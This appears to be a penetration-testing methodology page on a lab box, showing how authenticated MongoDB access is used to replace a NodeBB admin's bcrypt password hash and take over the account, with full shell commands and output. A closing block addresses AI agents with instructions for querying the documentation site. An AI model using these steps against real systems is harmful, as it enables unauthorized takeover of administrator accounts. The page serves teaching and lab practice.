# Authenticated MongoDB With valid credentials we can overwrite databases and chage passwords and configuration for other services that are around. This could be generating a new htapssword for webdav or nodebb. ``` ┌──(kali㉿kali)-[~] └─$ mongo mongodb://admin:monkey13@192.168.120.186:27017/ MongoDB shell version v4.2.13 connecting to: mongodb://192.168.120.186:27017/?compressors=disabled&gssapiServiceName=mongodb Implicit session: session { "id" : UUID("42164b37-99dd-429d-91fc-65cc46e0240a") } MongoDB server version: 4.0.22 ... --- > show databases admin 0.000GB config 0.000GB local 0.000GB nodebb 0.000GB > ``` ``` > use nodebb switched to db nodebb > db.objects.find({ _key: /^user:1$/ }) { "_id" : ObjectId("6017626e253f4a61ea72a355"), "_key" : "user:1", "email" : "admin@tico.offsec", "joindate" : 1612145262550, "lastonline" : 1612146689780, "status" : "online", "uid" : 1, "username" : "admin", "userslug" : "admin", "password" : "$2a$12$T3BIimnZgfw60c12wFA99.MbugSdE0hfl/SSCYFZJ7jTVHe5PGGB6", "groupTitle" : "[\"administrators\"]", "topiccount" : 1, "postcount" : 1, "lastposttime" : 1612145263314 } ``` We see a single record in the collection, which belongs to the default admin user. We need to generate a new salted password hash to replace the `password` field in the record. We can do that with the `htpasswd` utility by generating a new *bcrypt* hash of the password `password`. ``` ┌──(kali㉿kali)-[~] └─$ htpasswd -bnBC 12 "" password :$2y$12$6.8Es6W3Cyc0en31K4inBef3mCoJaDo2lJ6biXdUmKXfrsSqlfgsW ``` Before using it, however, we first need to strip off the leading `:`. ``` ┌──(kali㉿kali)-[~] └─$ htpasswd -bnBC 12 "" password | tr -d ':' $2y$12$LMqnkbq1FpTnOzAWTgizbugAOpGJaKl0h7PVHvDraW9e0wK2SR7Zu ``` Next, we'll overwrite the target password field with our newly generated hash. ``` > db.objects.update({ _key: /^user:1$/ }, { $set: { password: "$2y$12$LMqnkbq1FpTnOzAWTgizbugAOpGJaKl0h7PVHvDraW9e0wK2SR7Zu" }}) WriteResult({ "nMatched" : 1, "nUpserted" : 0, "nModified" : 1 }) > exit bye ┌──(kali㉿kali)-[~] └─$ ``` --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://lyethar.gitbook.io/methodology/readme/exploitation/vulnerable-services/authenticated-mongodb.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.